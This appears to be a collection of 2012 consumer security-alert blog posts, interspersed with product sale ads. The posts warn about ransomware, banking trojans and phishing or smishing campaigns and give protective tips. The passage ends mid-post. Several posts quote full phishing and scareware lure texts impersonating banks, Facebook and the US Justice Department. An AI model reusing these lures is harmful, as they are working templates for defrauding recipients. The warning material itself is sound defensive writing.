FBI Warns Users Not to Fall for Reveton Ransomware Scam

The FBI's Internet Crime Control Center (IC3) has joined Trusteer in warning users about an ongoing malware attack that plants ransomware on the target PC, rendering the system useless until the user pays a $100 fine to unlock it.

The attack starts when the user visits a malicious website that infects their computer with the Citadel Trojan via drive-by-download. The Citadel Trojan then connects to its command & control server to download the Reveton ransomware.

Upon execution, Reveton locks the infected system and displays a fake warning message from the US Department of Justice claiming that the user’s IP address was used to view disturbing content, including child pornography, and that a $100 fine must be paid to unlock the system.

Attention!

This operating system is locked due to the violation of the federal laws of the United States of America! Following violations were detected

Your IP address is [YOUR IP]. This IP address was used to visit websites containing pornography, child pornography, zoophilia, and child abuse. Your computer also contains video with pornographic content, elements of violent and child pornography! Spam-messages with terrorist motives were also sent from your computer.

This computer lock is aimed to stop your illegal activity.

It is important to note that even if the user makes the mistake of paying off the “fine” cooked up by the Reveton ransomware, they’re still not off the hook.

The Citadel Trojan continues to work independently of the Reveton ransomware, harvesting personal and financial information that will be used by cybercriminals to commit identity theft and credit card fraud. The infected machine may also be recruited to participate in DDoS attacks and spam campaigns.

Protecting Your PC From Citadel & Reveton Malware

Since the Citadel Trojan is delivered via drive-by-download attacks, users can minimize their chances of infection by:

• Keeping your operating system patched and up-to-date.


• Installing updates for any software on your machine, especially Adobe Flash, Adobe Acrobat and Java since they are commonly exploited in drive-by-download attacks. You may also want to consider disabling Java if it’s not needed.


• Always run antivirus software and make sure the virus definitions are current.


• Remain vigilant and use common sense. Don’t visit sites that are suspicious, but keep in mind that cybercriminals often use compromised sites to conduct drive-by-downloads.

[via IC3 & Trusteer]

Don’t miss out on the latest tech news and computer security alerts! Follow us on Twitter at @hyphenet,  “Like” us on Facebook or add us to your circle on Google+

20 Reasons to Switch to Google+ [INFOGRAPHIC]

If you're like me, you like Google+, but don’t really use it because all of your friends are still on Facebook.

Any attempt to get folks to switch over has been in vain, too. In my case, I’m either asked what Google+ is or interrogated as to why they should bother making the switch – sometimes both.

First things that come to mind are a cleaner and more intuitive UI, integration with Google Services we can’t help but use and a mobile app that actually works, but there are plenty of other reasons.

This infographic by Infographic Labs happens to list 20 of them (well, aside from #15, but we can replace that with the fact that only 1 company will know everything there is to know about you versus two).

Feel free to present it to friends you’re trying to convince into jumping on the G+ bandwagon.



Infographic via Infographic Labs

Tinba Banking Trojan Proves Size Doesn't Matter When it Comes to Malware

It’s often said that good things come in small packages. Apparently the same rings true for very, very bad things.

Researchers over at CSIS Security have discovered what they describe as the world’s smallest banking Trojan, which they’ve named “Tinba” – short for Tiny Banker.

Upon infection, Tinba will hook itself into a variety of running processes including explorer.exe and svchost.exe, along with major browser processes like firefox.exe and iexplore.exe.

Whenever a user visits one of the targeted banking sites, Tinba will manipulate the page by injecting pages or forms to trick the end-user into supplying sensitive financial information like a credit card number or transaction authentication number (TAN).

The list of financial websites targeted by Tinba is said to be very small, but it’s important to note that the malware can inject insecure elements from external sites/servers into a supposedly secure session (HTTPS).

Like other banking Trojans, Tinba uses a RC4 encryption algorithm when communicating with its command & control servers (C&C). Four C&C domains are hardcoded within the malware – serving as a “phone home” list for Tinba to run through should any of the domains fail to respond. The last thing the attackers would want to do is lose track of their prey.

All of this is done with 20KB worth of code, free of any packing or advanced encryption and proof that data pilfering malware doesn’t require a large file size. Unfortunately, a smaller file size typically means a lower antivirus detection rate.

Be careful what files you download and be sure to keep your operating system and antivirus software up-to-date to minimize your chances of infection. And keep a sharp eye out for any suspicious activity when using banking websites (such as unusual requests for confidential information and the like).

Don’t miss out on the latest tech news and computer security alerts! Follow us on Twitter at @hyphenet,  “Like” us on Facebook or add us to your circle on Google+

Buy of the Week: HP Officejet 6600 e-All-in-One H711a Multifunction Printer for $135!

This offer expired on 6/1/12. Please check the banner at the top of the page for our current deal.

Consistent color value meets time-saving efficiency.

Print professional color for a low cost per page. Tap the touchscreen to access apps and control print, copy, and scan jobs. Easily print on the go, and share on a wireless network.

For a limited time, you can order a HP Officejet 6600 e-All-in-One Multifunction Printer from Hyphenet for only $135, plus shipping!

Specifications for HP Officejet 6600 e-All-in-One H711a Multifunction Printer

MFR#	CZ155A#B1H
Device Type	Fax / copier / printer / scanner
Printing Technology	Ink-jet ( color )
Inkjet Technology	HP Thermal Inkjet
Monthly Duty Cycle (max)	12,000 impressions
Max Copying Speed	Up to 32 ppm (mono) Up to 30 ppm (color)
Max Copying Resolution	Up to 600 x 600 dpi (mono) Up to 600 x 600 dpi (color)
Max Printing Speed	Up to 32 ppm (mono) Up to 30 ppm (color)
Max Printing Resolution	Up to 600 x 1200 dpi (mono) Up to 4800 x 1200 dpi (color)
Max Fax Transmission Speed	33.6 Kbps
Fax Resolutions	300 x 300 dpi
Scanning	1200 dpi
Document Feeder Capacity	35 sheets
PC Connection	Hi-Speed USB, 802.11b/g/n
Microsoft Certification	Compatible with Windows 7
Environmental Standards	ENERGY STAR Qualified
Warranty	1 year warranty (HP)

Don't miss out on this Buy of the Week! Call (619) 325-0990 to order your HP Officejet 6600 e-All-in-One H711a Multifunction Printer today!

Buy of the Week offer valid through June 1st, 2012.

* Shipping and taxes apply.

This offer expired on 6/1/12. Please check the banner at the top of the page for our current deal.

YouTube Winner Spam Directing Users to Canadian Pharmacy Websites

Feel free to ignore any emails purporting to be from YouTube claiming you’ve won something.

The only thing you’ve “won” is a referral to a Canadian pharmacy site.

Since March, spammers have been pushing out a variety of fake YouTube notification emails in order to drive traffic to Rx websites.

Here’s the latest variant hitting inboxes:

From: YouTube Service (service@youtube.com)
Subject: YouTube Service sent you a message: Congratulations, You Are A Winner! (Monthly Winner 2012)

YouTube             help center | e-mail options | report spam

YouTube Service has sent you a message:

Congratulations, You Are A Winner!

To: [YOUR EMAIL]

Monthly Winner 2012
hxxp://www.youtube.com/watch?v=Ef0xswglP7d4&feature=monthly_winner

You can reply to this message by visiting your inbox.

© 2012 YouTube, LLC

901 Cherry Ave, San Bruno, CA 94066

If you were to click on any of the links within the email, you would be taken to a Canadian pharmacy website like the one pictured on your right.

Past versions of the email have earned clicks by saying your video has been approved, your video is on the top of YouTube, or simply thanking you for your video.

What to Do With YouTube Spam

If you receive a YouTube email that turns out to be fake, I suggest you do the following:

• Avoid clicking on any links within the email. Remember, the goal is to generate traffic for Rx sites, so if this spam campaign is a bust they’ll be less inclined to send another.


• Mark the message as ‘Spam’ or ‘Junk’ in your email client.


• Delete the email immediately.

Side note: I have not come across a way to report these emails to YouTube. The YouTube support forums are littered with posts asking how to do it, but so far there’s no sign that the option actually exists. :(

Don’t miss out on the latest tech news and computer security alerts! Follow us on Twitter at @hyphenet,  “Like” us on Facebook or add us to your circle on Google+

Fake Facebook Cancellation Account Email Links to Malware Posing as Adobe Flash Update

Is Facebook sending out cancellation requests asking you to confirm whether or not you REALLY want to cut ties with your Facebook account?

No, but cybercrooks definitely are.

Not only that, but they’ve taken the time to make sure the email has the best chance of fooling people too.

The email, titled “Account Cancellation Request” appears to come from Facebook (noreply@facemail.com), which is very close to the legitimate “noreply@facebookmail.com” email address used to send out official Facebook notification emails.

And although the email doesn’t link to an official Facebook page, it DOES link to a (malicious) third-party application on Facebook. That means the email links will point to "facebook.com."  Clever, clever.

Here’s the email:

From: Facebook (noreply@facemail.com)
Subject: Account Cancellation Request

Hi [EMAIL],

We are sending you this email to inform you that we have received an account cancellation request from you. Please follow the link below to confirm or cancel this request.

Thanks,
The Facebook Team

To confirm or cancel this request, follow the link below:
click here

If you don’t want to receive these emails from Facebook in the future, please click unsubscribe. Facebook, Inc. Attention: Department 415 P.O Box 10005 Palo Alto CA 94303

Should you decide to click on the link within the email, you would be taken to the third-party Facebook app, which will nag you about downloading an unknown Java applet – which you should NOT do under any circumstances.

Screenshot Credit: Sophos

If you do make the mistake of allowing the Java applet to run, you will see a message telling you that Adobe Flash must be updated, which is a common ploy used in malware attacks.

…Which is exactly what this is.

Surprise! That's no Adobe Flash update, but malware that Sophos detects as Mal/SpyEye-B and Troj/Agent-WHZ.

How You Can Protect Yourself From This Attack?

Incase you were wondering: no, you do not receive an email similar to the one used in this attack if you attempt to deactivate your Facebook account.

When you deactivate your Facebook account, you will only receive an email confirming that it’s already been completed. Here is the real email sent by Facebook:

From: Facebook (noreply@facebookmail.com)
Subject: You have deactivated your Facebook account

Hi [NAME],

You have deactivated your Facebook account. You can reactivate your account at any time by logging into Facebook using your old login email and password. You will be able to use the site like you used to.

Thanks,
The Facebook Team

To reactivate, follow the link below:
http://www.facebook.com/home.php

This message was sent to neverthoughti@yahoo.com. If you don't want to receive these emails from Facebook in the future, please click: unsubscribe.
Facebook, Inc. Attention: Department 415 P.O Box 10005 Palo Alto CA 94303

Since that’s been cleared up, here are some other tips to stay safe:

• Always run antivirus software and be sure to keep the virus definitions up-to-date.


• Apply operating system and software updates as they’re released – just make sure you download the updates from trusted sources and not random email links. ;)


• Try to avoid clicking links within emails if possible. Type the URL directly into your browser web address bar instead.

How to Report the Email to Facebook

If you receive a copy of this email, you can report it by visiting this Facebook Help Center article and clicking the "let us know" link at the bottom.

[via Sophos]

Don’t miss out on the latest tech news and computer security alerts! Follow us on Twitter at @hyphenet,  “Like” us on Facebook or add us to your circle on Google+

SMS Scam Offers $1,000 Best Buy Gift Card

Did you receive a text message saying you were randomly selected to receive a $1,000 Best Buy gift card?

Don’t worry, you are not alone.

Scammers have been pumping out fake Best Buy gift card winner text messages for years, encouraging recipients to click on a link and provide personal information to redeem their “prize.”

Sure, the sender’s phone number and URL may change from time to time, but the overall goal of getting folks to expose their personal information or complete special “reward offers” to get their Best Buy gift card remains the same.

Here is a copy of the smishing (SMS phishing) message that was sent to MY phone this morning:

From: 8156940714
You have been randomly selected for a $1000 BestBuy Card. Get your prize now at www.winningpage[.]net/?id=lchklpcwhy

Some folks have taken to Best Buy’s forums to verify the $1,000 offer and report the scam, and Best Buy employees monitoring the posts have confirmed that this is a scam and the text messages are not coming from Best Buy.

Did You Get the $1,000 Best Buy Gift Card Scam Text Message Too?

If you happen to receive a text message similar to this one, you are advised to:

• Avoid clicking on any links included in the text message.


• Refrain from providing any personal or financial information.


• Delete the text message immediately.

Don’t miss out on the latest tech news and computer security alerts! Follow us on Twitter at @hyphenet,  “Like” us on Facebook or add us to your circle on Google+

Buy of the Week: 52" Sharp AQUOS 1080p LED Smart TV for $1,193

This offer expired on 5/25/12. Check the top banner ad for our current deal.

The Aquos LE640 series provides customers with tremendous value when compared to other large screen televisions.

With Sharp's Full HD 1080p X-Gen panel and LED edge lit technology delivers natural and vibrant picture quality. The LE640 LED series comes fully equipped with built-in ATSC/QAM/NTSC tuners, 4 HDMI inputs, 2 USB inputs with video, audio and picture streaming capabilities, built in Wi-Fi, DLNA, IP control as well as a revitalized and easy to use SmartCentral interface that will allow you to access popular applications, such as Netflix.

The proprietary AQUOS LED system comprised of the X-Gen LCD panel and UltraBrilliant LED enables an incredible dynamic contrast ratio of 4,000,000:1. 120 Hz fine motion enhanced virtually eliminates blur and motion artifacts in fast-moving video.

For a limited time, you can order a 52" Sharp AQUOS 1080p LED Smart TV from Hyphenet for only $1,193, plus shipping!

Supplies are limited, so call Hyphenet at (619) 325-0990 to order your 52" Sharp AQUOS 1080p LED Smart TV  today!

Specifications for the 52" Sharp AQUOS 1080p LED Smart TV

MFR#	LC52LE640U
Product Type	LED-backlit LCD TV
Diagonal Size	52" Class ( 52.03" viewable )
Dimensions	47.6 in x 13.1 in x 30.4 in - with stand
Widescreen	Yes
Resolution	1920 x 1080
Display Format	1080p (FullHD)
Motion Enhancement Technology	120Hz Fine Motion Enhanced
Video Interface	Component, composite, HDMI
HDMI Ports Qty	4 Ports
PC Interface	VGA (HD-15)
HDCP Compatible	Yes
Technology	TFT active matrix
Internet Streaming Services	Netflix, YouTube, Vudu, Facebook, Twitter, AQUOS Net
Additional Features	DLnA, UltraBrilliant LED System, X-GEN panel, Wi-Fi CERTIFIED, AQUOS Advantage LIVE, Smart TV
Sound / Speaker System	Stereo / 2 speakers
USB Port	Yes, 2 Ports
Environmental Standards	ENERGY STAR Qualified
Warranty	1 year warranty (Sharp)

Don't miss out on this Buy of the Week! Call (619) 325-0990 to order your 52" Sharp AQUOS 1080p LED Smart TV today!

Buy of the Week offer valid through May 25th, 2012 while supplies last.

* Shipping and taxes apply.

This offer expired on 5/25/12. Check the top banner ad for our current deal.

Zeus Variant Using Fake Cash-Back & Fraud Protection Offers to Steal Debit Card Information

Are you being prompted to enter your debit card information to redeem special rebates or enable fraud protection features when you visit Facebook or try to login to your Gmail, Hotmail or Yahoo account?

Your system is likely infected with Zeus malware.

Security researchers over at Trusteer have discovered that the latest P2P variant of the Zeus Trojan doesn’t just wait around for a user to login to their online bank account to snatch their login credentials or inject a web form to obtain whatever financial information the cybercrooks behind it are after.

Instead, the latest Zeus configuration attempts to leverage visits to the most popular sites into a case of debit card data theft.

How? By dangling bogus CashBack and –ironically enough– fraud protection offers in front of users whenever they visit Facebook, Gmail, Hotmail or Yahoo to get them to hand over their credit card information.

Zeus Trojan Offers Facebook Users 20% CashBack on Facebook Credit Purchases

When a user goes to satisfy their Facebook fix, Zeus will inject a page offering the user to link their debit card to their Facebook account to earn 20% CashBack on all Facebook Credit purchases:

Apply Now!
Link your Debit card to your facebook account. Transfer Facebook Credits to your bank account is now available! Earn up to 20% CashBacK purchasing Facebook Credits with your MasterCard or Visa Debit Cards.

[Credit Card Information Fields Here]

*Your Debit Card pin is ONLY used for verification purposes! It activates CashBack option. Never disclose your Debit PIN to anyone, including family and friends. Your Debit PIN is confidential and is for your use online.

Pretty sneaky stuff, huh?

Zeus Offers Fraud Protection to Gmail, Hotmail & Yahoo Users... as it Helps Cybercrooks Commit Fraud

Should a user attempt to check their Gmail, Hotmail or Yahoo inbox on a system infected with the Zeus variant in question, they’ll be presented with a fake page offering to protect them from fraud by utilizing the security features under the Verified by Visa or MasterCard SecureCode programs.  Talk about a cruel irony.

Here’s the sales pitch presented to Gmail users:

Screenshot Credit: Trusteer

We are glad to offer you participate in our brand new processing system created jointly with Verified by VISA, MasterCard SecureCode and Google Checkout.

Link your Debit card right now with your Google Mail Account and pay simply, securely at more than 3,000 stores online, starting January 1 2012. All you need to do is activate your card. Then, whenever you submit an order at a participating online store, Google checkout window will appear automatically. Enter your password, submit, and that’s it. Once activated, your card number cannot be used without your personal password for online purchases.

The spiel for Yahoo Mail is nearly identical - just swap out the Google name for Yahoo.

Meanwhile, Hotmail users are told they can connect their card to their Hotmail account, which will somehow magically stop purchases made without providing your Hotmail.com email address and assigned password:

Windows Live Inc. is concerned about the online security of its customers and as a result wants to ensure we’re doing all we can offer you as much protection as possible. Brand new free service allows you to set-up an Online Password at your Debit Card against unauthorized use through the Internet. After your Debit Card is “linked” to your e-mail address, no one will be able to use it without your Personal Password and access to your e-mail. It’s 100% secure fast and easy. Apply now and get absolute unauthorized charges protection, it’s compensated in full.

Of course, should a user make the mistake of falling for any of the offers outlined above, all of their billing information will be sent over to the cybercrooks behind the Zeus variant, who will either sell the information to the highest bidder or use it to buy whatever it is their little black heart’s desire.

“This attack is a clever example of how fraudsters are using trusted brands – social network/email service providers and debit card providers – to get victim’s to put down their guard and surrender their debit card information.” Trusteer’s CTO, Amit Klein wrote, “These webinjects are well crafted both from a visual and content perspective, making it difficult to identify them as a fraud.”

Always think twice before entering your personal or billing information and when in doubt, do a little research.

Zeus is often spread via malicious email file attachments and drive-by-downloads, so don't download any files attached to suspicious looking emails, always use antivirus software and keep your system's operating system up-to-date.

Don’t miss out on the latest tech news and computer security alerts! Follow us on Twitter at @hyphenet,  “Like” us on Facebook or add us to your circle on Google+.

Worm Spreading via Facebook Messages & Chat

It may be worthwhile to put our URL investigative tips to good use before following a shortened URL shared via private messages or chat on Facebook.

TrendMicro warns that malware is currently being spread via private and instant messages on Facebook containing a short link leading to a file archive, “May09-Picture18.JPG_www.facebook.com.zip.”

If said archive is unzipped and the contents opened, the system will be infected by a worm identified as WORM_STEKCT.EVL, which will disable whatever antivirus software is installed on the affected machine and connect to a remote site to send and receive information.

One of those “pieces of information” is another worm identified as WORM_EBOOM.AC.  Once WORM_EBOOM.AC is on your system, it will become your virtual social stalker and monitor all of your posting/browsing activities on Facebook, Myspace, Twitter, WordPress and Meebo. Occasionally it may fire off a message or two of its own that include a link that will help spread the infection.

Tips to Stay Safe

Not really into the idea of either of these worms making their way onto your PC? I don't blame you, so here are a few bits of advice on how to stay safe:

• Be cautious of links you follow and make an effort to do a little homework on links that appear suspicious.


• Don’t accept prompts to download/save a file if you didn’t initiate the download process and never download files from untrusted sources.


• Always use antivirus software and make sure it’s kept up-to-date.


• Minimize your chances of being messaged by a spammer/scammer by changing your Facebook privacy settings to only allow Friends or Friends of Friends send you messages.

Don’t miss out on the latest tech news and computer security alerts! Follow us on Twitter at @hyphenet,  “Like” us on Facebook or add us to your circle on Google+.

Skype Attack Infecting PCs with Poison Ivy Trojan

Skype users should be wary of random messages from their friends (or strangers if they allow IMs from folks that are not within their list of contacts)  that consist of nothing more than a virtual laugh and link:

“hahahahaha foto hxxp://random.photoalbumn.org”

Webroot researchers warn that messages like these are a part of a freshly launched malware campaign that’s using Skype to reach its targets.

Should a user make the decision to click on the spammed link, they will be prompted to download a file named “Photo9321092109313.JPG_www.facebook-com.exe,” which is obviously an executable that the cybercrooks (poorly) attempted to disguise as a harmless jpeg file. It’s no surprise that the file houses malware.

“The Photo9321092109313.JPG_www.facebook-com.exe sample has the following MD5, MD5: bc3214da5aac705c58a2173c652e031e, currently detected as Trojan.Win32.Jorik.PoisonIvy.yy, Trojan.Win32.Diple!IK by 16 out of 42 antivirus engines.” Dancho Danchev wrote on the Webroot Threat Blog, “Upon execution the binary, creates a batch script, installs a program to run automatically at logon, and creates a thread in a remote process.”

From there, the malware would open a backdoor and connect to hd.hidbiz.ru & 4.45.182.239:1986.

Keeping Your System Safe

To protect your PC from this malware attack, it’s recommended that you:

• Exercise caution when clicking links shared via Skype.


• Always run antivirus software and keep the virus definitions up-to-date.


• Set Windows (or whatever operating system you use) to display file extensions to avoid any “surprises.”


• Edit your Skype privacy settings to only allow IMs from people on your Contact list.

Don’t miss out on the latest tech news and computer security alerts! Follow us on Twitter at @hyphenet,  “Like” us on Facebook or add us to your circle on Google+.

Chase Phishing Email Asks You to Download a Web Page to “Confirm Account Information”

If you get an email posing as a notification from Chase saying that they’ve detected “an unusual error in your Online access” and need you to download a file attachment containing a web page that will allow you to “confirm your account information” - please delete it immediately.

Cybercriminals are taking another shot at tricking users into exposing their banking information by spamming out the following email to anyone on their mailing lists:

Dear Chase Online® Customer,

Chase Online® security has detected an unusual error on your Online access.

Therefore, we are sending you this e-mail as a security precaution to confirm to you the Inability to accurately verify your account information due to an internal error within our servers.

Due to this, we have sent you an attachment which contains the web page in order to confirm your account information. Download the attachment to your desktop and open the file to Get Started

However, Failure to do so may result in temporary account suspension. Please note that this is a security measure intended to help protect you and your account.

Thanks for your co-operation.
Security Center Advisor
Chase Online® Support Team

Let’s not forget the possibility of the file being booby-trapped with malware as well.

How Do I Know This is a Phishing Email?

According to the Security Center FAQ’s on Chase.com, Chase will NOT:

• Send e-mail that requires you to enter personal information directly into the e-mail.


• Send e-mail threatening to close your account if you do not take the immediate action of providing personal information.


• Send e-mail asking you to reply by sending personal information.


• Share your name with any contacts outside our firm in a manner inconsistent with our Privacy Notice.

Additionally, under the Security Center Tips section, Chase warns that you should never respond or reply to an email, phone call or text message that:

• Requires you to supply personal or account information directly into the e-mail.


• Threatens to close or suspend your account if you do not take immediate action and provide personal or account information.


• Solicits your participation in a survey where you are asked to enter personal or account information.


• States that your account has been compromised or that there has been third-party activity on your account and requests you to enter or confirm your personal or account information.


• States that there are unauthorized charges on your account and requests your personal or account information.


• Asks you to enter your User ID, password or account numbers, PIN or card expiration dates into an e-mail, non-secure webpage or text message.


• Asks you to confirm, verify, or refresh your account, credit card, or billing information.

Ok, This is Obviously a Phishing Email... So What Do I Do?

If you receive a Chase phishing email similar to the one above, it is recommended that you:

• Do NOT reply to the email.


• Do NOT download the file attached and definitely do NOT provide any sensitive information.


• Report the email to Chase by forwarding it to abuse@chase.com. (You will get an automated response from Chase letting you know that they’ve successfully received it.)


• Delete the email immediately.

(Tip: If you feel you’ve been a victim to fraud then I suggest checking out the How to Report Fraud page.)

Thank you to our reader for submitting the Chase phishing email to us!

Stay safe, everyone!

Don’t miss out on the latest tech news and computer security alerts! Follow us on Twitter at @hyphenet,  “Like” us on Facebook or add us to your circle on Google+.

Sophos' "Anatomy of an Attack" Seminar Coming to San Diego!

Anatomy of an Attack How Hackers Threaten Your Security Are you concerned that a malware attack will put your business at risk? Learn how today's cybercriminals target your computer, identity and money and get practical advice on how to combat anything that comes your way. Sophos security experts Chester Wisniewski and John Shier will explore how malware threats actually work and what you can do to protect your company today. They'll show you: What the threat landscape looks like, how it's changing, and trends to watch for A live demonstration of how a malware attack occurs, step-by-step The top 5 things you can do today to make your business more secure The seminar is FREE, but space is limited! Don't miss out!

When? Tuesday June 12, 2012 10:00 AM – 2:30 PM Where? San Diego Marriott Mission Valley 8757 Rio San Diego Drive, San Diego, CA 92108 Cost? FREE! How Can I Attend?

Don’t Click Links in “Your American Express Forgotten User ID” Spam

Did you get an email asking if you recently verified your login or reset your online American Express account password?

Make sure you don’t click on any links.

Cybercriminals are spamming out American Express phishing emails in an attempt to lead users to malicious sites housing the Blackhole Exploit Kit.

Users will see nothing more than a blank page reading, "PLEASE WAIT. Loading..." while the Blackhole exploit pack works silently in the background, attempting to take advantage of vulnerabilities within Java, Adobe PDF, Flash and other software to plant malware on the target machine.

Here’s a copy of the email we received:

From: AmericanExpress@welcome.aexp.com
Subject: Your American Express Forgotten User ID

Confirmation
Verify Your Request

Your Account Number Ending:

Dear Customer,

Did you recently verify your User ID or reset the password that you use to manage your American Expressâ Card account online?

If so, you can disregard this email. To help protect your identity online, we wanted to be sure that you had made this request.

If not, please click here, or log on to https://www.americanexpress.com/ so we can protect your account from potential fraud.

Thank you for your Cardmembership.

Sincerely,
American Express Customer Service

P.S. To learn how to protect yourself on the internet and for information about Identity Theft, Phishing and Internet Security, please visit our Fraud Protection Center at http://www.americanexpress.com/fraudprotection.

www.americanexpress.ca/privacy View Our Privacy Statement Add Us to Your Address Book

This customer service email was sent to you by American Express. You may receive customer service emails even if you have requested not to receive marketing emails from American Express.

Copyright 2012 American Express Company. All rights reserved.

AGNEUMYC0001001

Ways to Spot American Express Phishing Emails

Cybercriminals will do their best to imitate American Express emails, but there ways to tell the real from the fake.

• Pay attention to how you were greeted in the email. Were you addressed by name or “Dear customer”/”Dear cardmember”? If it’s the latter, then there’s a good chance that email came from a spammer and not American Express.


• Check for the last 5 digits of your account number. Legitimate emails from American Express that are related to your account will include this information, so if it’s missing then the email is likely a fake.


• Does the email create a false sense of urgency? Spammers want you to take action before you think, so fraudulent emails are likely to ask you to update or provide information ASAP or risk having your account suspended or closed.


• Hover your mouse over links within the email to verify the destination URL. If the links don’t point to an americanexpress.com domain, then you’d be better off typing the URL directly into your address bar or using your browser bookmarks/favorites.


• Check how many people are copied on the email. Having 10 other unfamiliar email addresses copied on the same email should be a HUGE red flag.

How to Report American Express Phishing Emails

Alright, so you’ve ran through the checklist above and suddenly that email doesn’t feel right. Now what?

You can report the phishing email to American Express by forwarding it to spoof@americanexpress.com. You’ll get an automated reply acknowledging they’ve received the email and they’ll take it from there.

Did You Fall for an American Express Phishing Email?

If you made the mistake of clicking on a link within a suspected American Express phishing email, you may want to:

• Perform a full system scan of your computer with your antivirus software.


• If you’ve provided any account information, contact American Express by calling the number on the back of your card.

Don’t miss out on the latest tech news and computer security alerts! Follow us on Twitter at @hyphenet,  “Like” us on Facebook or add us to your circle on Google+.

McAfee to Pinterest Users: Pin with Caution!

McAfee is advising Pinterest users to “pin with caution” to avoid falling for scams shared by cybercrooks looking to make a quick buck off of the pinboard-style social sharing site.

The scams are likely to resemble those shared on other social networking sites like Facebook:

• A “free gift card” offer or “shocking video” is posted on the site.


• Upon clicking it, the user is taken to another site that asks them to share (or “Pin”) the content before redeeming the offer.


• The user is redirected to a site that asks them to complete a never-ending cycle of surveys or an e-commerce site where the spammer can make money through an affiliate program.

“Many of these scams ask users to complete surveys which require the user to fill in his or her personal details like name, email address and mobile number.” McAfee warned, “This information can be used in various malevolent activities like spamming, but in the case of mobile devices, this may lead to premium calling numbers where users are stuck with the bill.”

Protect Yourself Against Pinterest Scams

To avoid becoming a victim, McAfee offers the following tips:

• Never share your password.  These tools make it very easy to mass-comment or post from any account.


• If any page asks you to “Pin It” before you can see the content, this is mostly likely a scam. Do not click on the “pin it” button and leave the page.


• If any page offers you a “free gift card” and redirects you to a survey, this is most likely a scam. Do not click on the “pin it” button and leave the page.


• Be careful while clicking links that have catchy titles like “shocking video,” “you will not believe it,” ”free give away,” etc. Most of the time, these lead to scams.

What to Do If You Fall for a Pinterest Scam

If you happen to fall for a Pinterest scam, make sure that you:

• Remove the spam pins that were posted on your account


• Report any other pins related to the scam using the "Report Pin" feature.


• Change your Pinterest password if you shared it at any time.

Have you come across any scams on Pinterest?

Photo Credit: Inkhouse

Don’t miss out on the latest tech news and computer security alerts! Follow us on Twitter at @hyphenet,  “Like” us on Facebook or add us to your circle on Google+.

Diablo 3 Madness: Survey Scams, Malware, & Legitimate D3 Sweepstakes

Tread carefully if you’re on the hunt for a free Diablo 3 download.

As millions of gamers worldwide know, Diablo 3 was finally released today and cybercriminals have prepared for the highly anticipated launch of the third-installment of the Diablo series by setting up survey scams and malicious D3 game downloads.

The survey scams can easily be spotted as they typically request that you share the “download offer” on Facebook (or another social network site) and, of course, require that you complete a survey or two.

Malware disguised as a full copy of Diablo 3 can also be avoided by downloading it through your Battle.net account versus some third-party site with a random domain name like “free-diablo3-download.com.”  Or you could always pick up a copy in-store (just verify that it’s in stock before heading there).

Are there FREE copies of Diablo 3 out there?

Scammers were using the word “free” to lure people into their D3 survey traps, but can you really get a copy of D3 without paying for it?

As luck would have it, there are some freebie offers out there – with a catch.

Enter the Diablo 3 Sweepstakes

This sweepstakes ended on May 19th.

The full details were on PCMag.com.

Go for the Diablo 3 Starter Edition

The catch? This is NOT the full version of the game and is mostly just for test drive purposes.

If a buddy of yours picked up a box copy of Diablo 3, then they may be willing to hand over the Guest Pass that was included. Once you have a Guest Pass, you can login to your Battle.net account and download the game client from the Account Management page.

Again, the Diablo 3 Starter Edition is just a way for you to test drive the game before making the full purchase and has the following restrictions:

• Act I up to the Skeleton King is available


• Level 13 cap


• Matchmaking available only with other Starter Edition players


• No Real Money Auction House access

As far as I know, those are the only two real ways to get "free" copies of Diablo 3.

Be smart about getting your copy and have fun gaming!

Don’t miss out on the latest tech news and computer security alerts! Follow us on Twitter at @hyphenet,  “Like” us on Facebook or add us to your circle on Google+.

Check for Malware if You're Seeing Ads on Wikipedia

Are you seeing ads on Wikipedia?

Did Wikipedia cross over to the dark-side and insert those obnoxious, flashy advertisements into their site pages to generate revenue?!

No, no. It’s nothing like that.

On Monday, Wikipedia took to their blog to warn users that if you’re seeing advertisements for a for-profit industry on their website, then it’s likely that your computer has been hit with malware.

Screenshot Credit: Wikipedia

The culprit is likely to be a malicious browser extension that managed to sneak its way onto your system (you didn’t fall for a Facebook scam recently, did you?), and Wikipedia advised that a Chrome browser extension named “I want this” has been found to inject ads on sites the user visits.

That's only one example, though. There are likely ad-injecting browser extensions  for every popular web browser, regardless if it’s Internet Explorer, Firefox or Chrome.

So what should you do if you’re seeing ads on Wikipedia – or any other site that’s not known to carry ads?

• Check your browser for suspicious plug-ins.
  
  
  
  • Chrome -> Click the Tool icon on the top right -> Hover over ‘Tools’ -> Click ‘Extensions’
  
  
  • Firefox -> Click the orange ‘Firefox’ tab -> Select ‘Add-ons’  -> Check under ‘Extensions’ and ‘Plugins’
  
  
  • Internet Explorer -> Click ‘Tools’ in the top menu -> Select ‘Manage Add-ons’
  
  
  
  


• Scan your system with an anti-malware program like Malwarebytes or Ad-aware.


• Do a full system scan using whatever antivirus software is installed.

Don’t miss out on the latest tech news and computer security alerts! Follow us on Twitter at @hyphenet,  “Like” us on Facebook or add us to your circle on Google+.

Order a HP EliteBook 8460p Notebook for only $838!

This offer expired on 5/18/12. Please check the ad at the top of the page to see our current deal.

Build projects, inspire teams and impress clients with this HP notebook with a vibrant 14" display and advanced graphics performance.

Outstanding battery-life and a rugged design make this the mobile professional's essential tool. Create documents, spreadsheets and presentations without slow load times, freeze-ups or stalls. This streamlined workhorse helps you complete projects fast and efficiently.

For a limited time, you can order a HP EliteBook 8460p Notebook from Hyphenet for only $838, plus shipping!

Call Hyphenet at (619) 325-0990 to order your HP EliteBook 8460p Notebook today!

Specifications for the HP EliteBook 8460p Notebook

MFR#	LJ540UT#ABA
Display	14" LED backlight HD Anti-glare 1366 x 768
Processor	Intel Core i5 2450M / 2.5 GHz
RAM	4 GB DDR3 SDRAM - 1333MHz
Hard Drive	500 GB (7200 RPM)
Optical Drive	DVD SuperMulti DL
Graphics Processor	Intel HD Graphics 3000
Networking	802.11n, Bluetooth 2.1 EDR, Gigabit Ethernet
Operating System	Windows 7 Pro 64-bit
Warranty	Limited 1-year warranty.

Don't miss out on this Buy of the Week! Call Hyphenet at (619) 325-0990 to order your HP EliteBook 8460p Notebook today!

Buy of the Week offer valid through May 18th, 2012.

This offer expired on 5/18/12. Please check the ad at the top of the page to see our current deal.

* Shipping and taxes apply.

BBB Warns of Phishing Emails with Malicious File Attachments

The Better Business Bureau is warning small businesses and consumers across the country about a phishing email campaign using the BBB's trusted name to dupe users into downloading malicious file attachments.

In the attack, users receive an email stating that a complaint has been filed against them with the Better Business Bureau and details of the complaint are included in a zip file attached to the email:

Subject: BBB assistance Re: Case #508067
From: Better Business Bureau (abuse@bbb.org)
